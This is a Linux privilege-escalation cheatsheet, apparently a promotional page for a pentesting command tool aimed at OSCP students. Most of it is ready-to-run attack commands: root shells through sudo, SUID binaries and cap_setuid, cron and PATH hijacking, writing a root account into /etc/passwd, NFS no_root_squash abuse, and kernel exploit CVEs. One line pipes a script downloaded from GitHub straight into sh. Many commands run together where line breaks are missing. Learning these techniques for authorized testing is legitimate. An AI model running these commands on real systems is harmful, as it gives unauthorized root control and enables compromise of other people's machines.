# Initial Enumeration
Privilege escalation is 90% enumeration. Gather context before touching any exploit — who you are, what you can run, and what the system looks like.
id && whoami && groupsuname -a; cat /etc/os-releasesudo -lfind / -perm -4000 -type f 2>/dev/nullgetcap -r / 2>/dev/nullcat /etc/crontab; ls -la /etc/cron.*ps aux | grep -i rootnetstat -tulpn 2>/dev/null || ss -tulpn# Sudo Exploitation
After sudo -l, cross-reference every allowed binary with GTFOBins. Many everyday tools spawn a root shell when run through sudo.
sudo vim -c ':!/bin/sh'sudo find . -exec /bin/sh \; -quitsudo awk 'BEGIN {system("/bin/sh")}'sudo env /bin/shsudo -u#-1 /bin/bashsudo --version. Versions < 1.9.5p2 are vulnerable to Baron Samedit (CVE-2021-3156), a heap overflow giving instant root.# SUID / SGID Binaries
A SUID binary runs as its owner (often root) no matter who launches it. Enumerate, then exploit via GTFOBins' "SUID" section.
find / -perm -4000 -type f 2>/dev/nullfind / -perm -2000 -type f 2>/dev/null./bash -pfind /tmp -exec /bin/sh -p \; -quitcp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash# Linux Capabilities
Capabilities grant slices of root power to specific binaries. cap_setuid is the jackpot.
getcap -r / 2>/dev/null/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'/usr/bin/perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh";'# Cron Jobs
Root-owned scheduled scripts that you can write to — or that use exploitable wildcards — are a classic path to root.
cat /etc/crontab; ls -la /etc/cron.d /etc/cron.dailygrep -rl "" /etc/cron* 2>/dev/null | xargs ls -la 2>/dev/nullecho 'cp /bin/bash /tmp/rb; chmod +s /tmp/rb' >> /path/to/writable_cron.shtar czf backup.tar.gz * in a writable directory can be hijacked by creating files named like tar flags (e.g. --checkpoint-action=exec=sh rootshell.sh).# PATH Hijacking
When a privileged program calls a command without an absolute path, you control which binary actually runs.
strings /path/to/suid_binary | grep -iE 'service|cp|cat|sh|system'echo '/bin/bash -p' > /tmp/service; chmod +x /tmp/serviceexport PATH=/tmp:$PATH; /path/to/suid_binary# Credentials & Sensitive Files
Hardcoded passwords, private keys and a writable /etc/passwd are found on more boxes than you'd think.
grep -rniE 'password|passwd|secret|api_key' /var/www /home /opt 2>/dev/nullfind / -name id_rsa 2>/dev/null; find / -name '*.kdbx' 2>/dev/nullls -l /etc/passwdopenssl passwd -1 -salt x hackedecho 'root2:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd; su root2cat ~/.bash_history; sudo cat /var/mail/root 2>/dev/null# NFS Root Squash Misconfiguration
An NFS share exported with no_root_squash lets you write files as root from a machine you control.
cat /etc/exports; showmount -e TARGETmount -o rw TARGET:/share /mnt/nfscp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash# Kernel Exploits (Last Resort)
Use these only after exhausting misconfiguration paths — they can crash the target. Always match the exact kernel from uname -r.
| Exploit | CVE | Affected |
|---|---|---|
| DirtyPipe | CVE-2022-0847 | Kernel 5.8 – 5.16.11 |
| DirtyCow | CVE-2016-5195 | Kernel 2.6.22 – 4.8.3 |
| PwnKit (polkit) | CVE-2021-4034 | Most distros pre-2022 |
| Baron Samedit | CVE-2021-3156 | sudo < 1.9.5p2 |
searchsploit linux kernel $(uname -r | cut -d- -f1)./PwnKit# Automated Enumeration Tools
Automate the boring parts — but understand every finding. On the OSCP exam, automated tools are limited, so manual skill matters.
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh./linenum.sh -t./pspy64python3 linux-exploit-suggester.py❓ Linux Privilege Escalation FAQ
Enumerate everything. Start with id, sudo -l, uname -a and SUID discovery (find / -perm -4000). Automated tools like LinPEAS help, but manual enumeration is essential for the OSCP exam.
Run sudo -l and cross-reference each allowed binary with GTFOBins. Many binaries (vim, find, awk, python) spawn a root shell via sudo. Also check the sudo version for CVE-2021-3156.
A SUID binary runs with its owner's privileges (often root). Find them with find / -perm -4000 2>/dev/null, then check GTFOBins for that binary's SUID exploitation method.
Capabilities split root's power into fine-grained units. Find them with getcap -r / 2>/dev/null. Dangerous ones like cap_setuid on python or perl let you become root directly.
Check /etc/crontab for root scripts. If a scheduled script is writable, or uses a relative path or wildcard you control, you can inject commands that run as root.
If a SUID binary or cron script calls a command without an absolute path, place a malicious binary with that name earlier in $PATH. When root runs the program, your binary executes as root.
Only as a last resort — they can crash the target. Exhaust misconfiguration paths (sudo, SUID, cron) first, and match the exact kernel from uname -a before compiling any exploit.
LinPEAS is an automated enumeration script highlighting privesc vectors colour-coded by likelihood. Run ./linpeas.sh and review the red/yellow findings. It complements — not replaces — manual enumeration.
📚 Related Resources
- OSCP Cheatsheet — Full OSCP exam command reference where privesc is 25% of the marks
- Nmap Cheatsheet — 100+ scanning commands — the recon step before you ever get a shell
- Active Directory Cheatsheet — Kerberoasting, Pass-the-Hash, DCSync and the road to Domain Admin
- Windows Privilege Escalation Cheatsheet — The Windows counterpart: tokens, services, AlwaysInstallElevated
- Reverse Shell Cheatsheet — Every payload to get the initial shell before you escalate
- Full Pentesting Cheatsheet — 200+ commands: recon, web, exploitation, Active Directory
- Pentesting Glossary — SUID, capabilities, CVE and 60+ key terms defined
Turn your privesc findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This privesc cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →